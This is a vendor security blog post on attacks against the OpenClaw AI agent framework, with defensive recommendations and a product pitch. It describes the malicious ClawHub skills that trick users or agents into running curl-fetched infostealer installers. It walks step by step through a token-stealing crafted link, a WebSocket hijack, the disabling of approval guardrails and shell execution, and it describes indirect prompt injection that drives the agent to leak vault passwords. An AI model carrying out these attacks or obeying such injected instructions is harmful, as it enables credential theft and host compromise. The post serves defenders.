Exploiting the OpenClaw Agentic Loop

The AI assistant that promised to revolutionize personal productivity is more of a cautionary tale about security in the age of artificial intelligence. In late 2025, a shift occurred that signaled a new species of software: OpenClaw. OpenClaw, formally known as Moltbot and Clawdbot, is an open-source framework acting as a digital assistant, simplifying your digital work and personal life.

OpenClaw is gaining quick adoption by users to automate their workflows. The first week of Febru Recent data from Token Security indicates that 22% of surveyed organizations have employees actively using Clawdbot (OpenClaw). However, in reality OpenClaw is introducing significant security risks to users and their devices. Since the personal AI assistant can operate with legitimate corporate OAuth tokens and API keys, they are a silent, high-impact entry point for credential theft and lateral movement within the enterprise.

What is OpenClaw and Why Does It Matter?

OpenClaw's security risks stem directly from its architecture. Instead of residing on remote company servers like standard AI assistants, OpenClaw operates locally on the user's laptop or private server as a persistent, 24/7 background service. This constant activity essentially maintains a permanent gateway on the user's network that attackers could exploit. Specifically, the application runs as a Node.js-based daemon, typically binding to TCP port 18789. By remaining active even when not in use, this gateway provides adversaries with a continuous, round-the-clock attack surface. Prior to OpenClaw version 2026.1.29 you could choose to bind to external/all interfaces without requiring authentication, now that's prohibited.

How OpenClaw Stores Your Life

OpenClaw keeps a "long-term memory" by saving your settings, chat histories, and habits in plain-text markdown (.md) files such as “MEMORY.md” or “SOUL.md”. These files reside in predictable locations, often within the ~/.clawdbot/ or ~/.openclaw/ directories. While this makes the system transparent and easy to control, it also creates a high-risk map of your digital identity. To a cybercriminal, these files are a blueprint for impersonation, containing your private conversations and sensitive project details in a format that is very easy to read and steal.

Capabilities and the Clawhub Marketplace

OpenClaw is not just a chatbot, it functions as a digital assistant with administrative reach. It utilizes packages called “skills” found on the OpenClaw marketplace, ClawHub, to execute tasks. These “skills” allow the OpenClaw agent to perform tasks such as: reading and sending emails, browsing websites and filling out forms, and executing commands on your behalf, including interacting with secure software. Its primary appeal lies in its ability to automate multi-step workflows that previously required human interaction.

The appeal of OpenClaw's "hands-off" automation has resonated strongly with users, leading to viral adoption within the OpenClaw community. This momentum is best illustrated by the rapid expansion of the ClawHub marketplace. In the first week of February 2026, the ClubHub marketplace listed approximately 3,000 skills. As of February 13, 2026, that number has increased 200% to over 9000+ skills. This is only skills listed on ClawHub and does not take into account other pastebin-type sites where “skill” files can be stored, such as glot[.]io.

OpenClaw's rapid adoption, achieving this growth in less than two weeks, indicates its nature as a platform, not merely a tool. By allowing third-party developers to contribute to its "administrative reach," OpenClaw is rapidly building a library of automations that could soon cover nearly every repeatable digital task in the modern workplace.

The Agentic Loop: From Thinking to Doing

OpenClaw differentiates itself from standard chatbots through an Agentic Loop. It utilizes the Playwright library for browser automation, allowing the agent to interact with websites similar to a human. By connecting this to large language models (LLMs), like GPT-4 or Claude, the agent decides on a goal, executes a step via a terminal or browser, and feeds the result back into its memory. It does not just suggest code; it runs it. It does not just draft an email; it sends it.

This autonomy relies on three pillars: persistent memory, deep local access, and the ability to trigger actions without receiving input from a human. However, the framework’s documentation admits to a "Faustian bargain": users must often abandon traditional security constraints to enable these features. The agent frequently stores transcripts, "skills," and authentication tokens in predictable plain-text files on disk so the agent can easily read them. This creates a "pot of gold" for infostealers, allowing attackers to exfiltrate a user's entire digital life in seconds.

Claw 1: Weaponizing "Skills" on ClawHub

The threat landscape extends beyond software vulnerabilities to active supply-chain attacks. Business Insights Cybersecurity reported that the Clawhub marketplace hosted close to 900 malicious "skills", which was 20% of the total "skills" offered as of February 05, 2026. The largest malicious “skills” supply-chain campaign, referred to as "ClawHavoc", utilizes a social engineering methodology similar to the “ClickFix” technique. These malicious skills masquerade as utility tools relating to cryptocurrency, social media, and YouTube. When a user attempted to install the skill, the OpenClaw agent would output a simulated error message or a "verification requirement" stating that an additional component was needed for compatibility.

The most common of these prerequisites is "AuthTool". Users were provided with a specific terminal command, claiming it was necessary to fix the environment. On macOS systems, these commands often involved a curl call to a remote host (frequently glot.io or a GitHub Gist) that downloaded a multi-stage shell script. This script would decode an obfuscated payload to install the Atomic macOS Stealer (AMOS), a commodity infostealer designed to raid browser data, crypto wallets, and password manager vaults. Windows users were similarly targeted with instructions to download password-protected ZIP archives containing trojanized binaries.

The structural vulnerability of the OpenClaw “skill” ecosystem lies in the collapse of the line between documentation and execution. Users and OpenClaw agents both treat skill instructions as authoritative installers. In an agentic loop, the OpenClaw agent may autonomously decide to "fix" an installation error by executing the very commands that lead to compromise.

Claw 2: The “1-Click” Vulnerability

The most immediate threat to the OpenClaw ecosystem is a critical vulnerability identified as CVE-2026-25253, which enables a "1-click" remote code execution (RCE) attack. By design, the OpenClaw accepts a gatewayUrl parameter via a query string. Researchers discovered the application blindly trusts this parameter and automatically establishes a WebSocket connection to that URL on page load without any user confirmation.

The attack occurs in milliseconds once a user clicks a crafted malicious link, such as https[:]//openclaw[.]app/?gatewayUrl=wss[:]//attacker-server[.]com. The OpenClaw frontend blindly trusts the user-supplied URL and initiates an automatic WebSocket connection. During the standard WebSocket handshake, the application is programmed to bundle the user's administrative authToken into the connection payload to facilitate seamless reconnection. Since the connection is redirected to an attacker-controlled server, the adversary captures the token required to impersonate the administrator of the local gateway.

Once the token is exfiltrated, the attacker performs a Cross-Site WebSocket Hijacking (CSWSH) attack. Because the OpenClaw WebSocket server lacks proper origin validation, the attacker can use the stolen token to connect back to the victim's local instance (typically at ws[:]//localhost:18789) directly from the browser. This bypasses traditional firewall protections by using the victim's own browser as a bridge into the internal network.

The exploit follows this sequence:

1. Token Theft: A victim clicks a crafted link containing a malicious gatewayUrl. The OpenClaw instance immediately connects to the attacker’s server and automatically bundles the user's sensitive authToken in the handshake.
2. WebSocket Hijacking (CSWSH): Because the OpenClaw server fails to validate the Origin header, the attacker uses the stolen token to connect to the victim's local instance (e.g., ws[:]//localhost:18789) directly from a malicious website.
3. Sandbox Escape: Using the token's administrative scopes, the attacker disables safety guardrails via the exec.approvals.set API and forces the agent to run commands on the host machine instead of a containerized sandbox.
4. Full Execution: The attacker executes a node.invoke request to run arbitrary shell commands, gaining complete control of the host system.

Although the CVE-2026-25253 vulnerability was patched in OpenClaw version 2026.01.29, researchers identified over 17,500 vulnerable instances of OpenClaw (and its predecessors) as of February 03, 2026.

Claw 3: User Credentials

The risk to vaulted credentials in managers like 1Password or LastPass, is especially concerning when users install “skills” designed to bridge the OpenClaw agent with their password vaults. As of February 04, 2026, there were over 125 skills requesting private keys or passwords, including master passwords for password managers, YubiKey one-time-passwords (OTPs), Azure client secrets, Stripe secret keys, and blockchain wallet keys.

While these integrations promise productivity, they collapse the critical security boundary between untrusted web content and sensitive authentication data. Despite Openclaw’s attempts to sanitize external inputs, these defenses are easily bypassed. Because OpenClaw can reason over and act on external inputs, it is highly susceptible to indirect prompt injection; an attacker can embed hidden instructions in a webpage or email that, when processed by the agent, trigger a command to retrieve a password from the vault and exfiltrate it to a remote server.

These credentials are loaded directly into the agent’s runtime. Combined with 179 skills that download unsigned, password-protected binaries from random GitHub repositories, this creates a perfect storm of unvetted code, high-value credentials, and agents that can be remotely controlled via poisoned content.

Network Detection and Response

Traditional security tools, such as firewalls and endpoint detection and response (EDR), may not reliably account for the deep local access and autonomous execution capabilities of agentic frameworks like OpenClaw. These tools frequently rely on host-based logs or agents that adversaries can bypass by exploiting the framework’s inherent architectural requirements. To enable full agent autonomy, users must often abandon traditional security constraints, creating a gap in host-resident visibility. These constraints might include sandbox and execution isolation, user oversight by disabling user approval prompts, encrypted storage, and more.

The ExtraHop RevealX platform addresses these challenges by providing a real-time view of activity across the network without relying on local system data.

• Deep Decryption and Protocol Fluency: RevealX removes the barrier of encryption by decrypting traffic at line rates up to 100 Gbps. It natively decodes more than 90 protocols in real time, including modern standards like TLS 1.3 and internal protocols like Kerberos and SMBv3. This wire-speed analysis eliminates blind spots and provides immediate insight into complex traffic streams that other tools often miss.
• AI-Driven Behavioral Detection: RevealX automatically learns and baselines normal behavior for every device and user by profiling thousands of network metrics. The platform uses cloud-scale AI to identify those deviations that indicate various attacker activities. This behavioral approach allows the platform to trigger high-confidence alerts for anomalous activities such as lateral movement or unauthorized data exfiltration.
• Unified Context: RevealX consolidates network detection (NDR), performance management (NPM), intrusion detection (IDS), and forensics into a single platform. It provides comprehensive visibility across the entire attack chain, from reconnaissance to command and control. This unified data set also allows teams to identify and resolve network performance issues without switching tools.
• Forensics and Response Integration: Continuous network recording allows security teams to trace the full path of an attack from initial entry to final execution. RevealX enriches alerts with deep network context and immutable packet-level evidence to enable precise response actions. Integrated workflows put analysts just three clicks away from the root cause and the precise packets that prove it.

Securing against OpenClaw requires a strategy that combines automated alerts with proactive investigation. While the platform identifies general behavioral categories, specific exploitation is caught by Suspicious Web Request and Long-lived Connection detections. To close this visibility gap, security teams can use the ExtraHop Query Language (EQL) as a precision tool to hunt for specific application fingerprints. Detections signal that an attack is occurring, while EQL allows analysts to trace the full path and confirm exactly what occurred once access was gained.

Table - OpenClaw TTP Table Mapped to ExtraHop NDR Capability

Conclusions

The rapid adoption of tools like OpenClaw demonstrates a genuine demand for AI-driven productivity. However, the first wave of agentic security has shown that adoption has far outpaced the hardening of the underlying infrastructure. As these autonomous assistants move from suggestion to direct execution, they break traditional security boundaries by requiring deep local access and the abandonment of standard constraints like sandbox isolation and user oversight. This architectural model, while efficient, introduces a persistent 24 x 7 attack surface that operates as an unmanaged gateway into the enterprise, often with the same authority as a legitimate user.

To address these emerging risks organizations must move beyond a reliance on host-resident visibility and implement strict network controls that treat every agent as a potential vector for compromise. By utilizing NDR platforms like ExtraHop RevealX to monitor for anomalous behavior, security teams can identify the specific network signatures of agentic exploitation in real time. Maintaining a proactive view of the network allows organizations to realize the promise of autonomous assistants without surrendering the keys to their digital identity.

Recommendations

While the risks of agentic AI are not insurmountable, managing them requires a proactive strategy that goes beyond merely blocking their use. It is crucial to understand the potential risks to your network and assets if you opt to allow agentic AI.

Governance and Visibility: The primary risk of OpenClaw is that it is "invisible" to IT. Organizations should implement continuous asset discovery focused on port 18789 and the OpenClaw or Clawdbot process names. Establishing a clear policy on "Bring Your Own AI" (BYOAI) is essential, as research indicates that 22% of organizations already have these agents active on their networks.

Mandatory Patching: Upgrade all OpenClaw, Moltbot, and Clawdbot instances to version 2026.1.29 or later immediately.

Network-Level Isolation: Agentic assistants should be treated as untrusted IoT devices. If OpenClaw is permitted for research or development purposes, it should be run in an isolated VLAN with no direct access to the management subnet or internal secret stores.

"Skills" Vetting and Least Privilege Permissions: The supply chain risks of ClawHub require a zero-trus" approach to "skills." Users should be prevented from granting "God Mode" permissions to their agents. Organizations should consider white-listing specific, internally-audited "skills" and blocking outbound terminal commands from the agent process using host-based firewalls or EDR policies.

Continuous Monitoring for Behavioral Drift: Because the OpenClaw agent’s behavior is autonomous, defenders must look for behavior anomalies. If an agent that normally interacts only with Slack suddenly starts scanning the internal network for SMB shares or exfiltrating “.md” files to a new destination, this should be treated as highly suspicious and be investigated. Integrating NDR telemetry with SIEM logs is critical to "connecting the dots" between a user clicking a link and a subsequent credential exfiltration event.

Learn More About ExtraHop

The network usually tells the story that logs and endpoints often miss. If you want to see how this actually works in practice, or if you're just curious about how your own environment holds up, there are a few ways we can help:

• See it in action: We can jump on a quick call to show you exactly how RevealX picks up on the TTPs used by threat actors.
• Check your blind spots: We offer a simple network security assessment to help you find out if there’s activity moving sideways through your environment that your current tools aren't catching.
• Your experts speak with our experts: If you have specific questions about OpenClaw your team can spend time with ours.

Click HERE to schedule your time with us and learn more about ExtraHop NDR.

Sources:

1. https://www.functionize.com/blog/the-agentic-loop-reimagining-the-future-of-qa
2. https://1password.com/blog/its-openclaw
3. https://businessinsights.bitdefender.com/technical-advisory-openclaw-exploitation-enterprise-networks
4. https://depthfirst.com/post/1-click-rce-to-steal-your-moltbot-data-and-keys
5. https://hunt.io/blog/cve-2026-25253-openclaw-ai-agent-exposure
6. https://www.cyera.com/research-labs/the-openclaw-security-saga-how-ai-adoption-outpaced-security-boundaries
7. https://medium.com/@MaanVader/agent-vs-agent-how-i-used-chack-to-audit-openclaw-and-uncover-10-critical-flaws-f799b313bd1c#4985
8. https://businessinsights.bitdefender.com/technical-advisory-openclaw-exploitation-enterprise-networks